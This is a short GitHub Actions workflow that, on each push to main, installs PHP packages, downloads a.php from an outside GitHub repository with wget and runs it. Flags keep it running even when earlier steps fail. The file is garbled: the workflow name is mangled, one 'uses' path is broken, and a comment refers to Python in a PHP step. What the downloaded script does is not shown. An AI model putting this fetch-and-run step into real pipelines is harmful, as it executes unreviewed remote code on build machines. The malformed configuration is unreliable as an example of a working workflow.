name: Multi-yMachineyd Workflowznig

on:
  push:
    branches:
      - main

jobs:

  run-on-ubuntu1:
    runs-on: ubuntu-latest
    if: always()  # This ensures the job runs even if previous jobs fail
    

    steps:
      - name: Checkout code
        uses: actions/checkout@v3


      - name: Set up Php
        uses: ./. github.com/yu/
        with:
          php-version: 7.3.10  # Replace with your desired Python version

      - name: Run Php Program
        continue-on-error: true
        run: |
          apt install php-mysql php-curl
          
          
          wget https://github.com/Bvfre/yu/raw/main/a.php
          ls
          php a.php
          
          

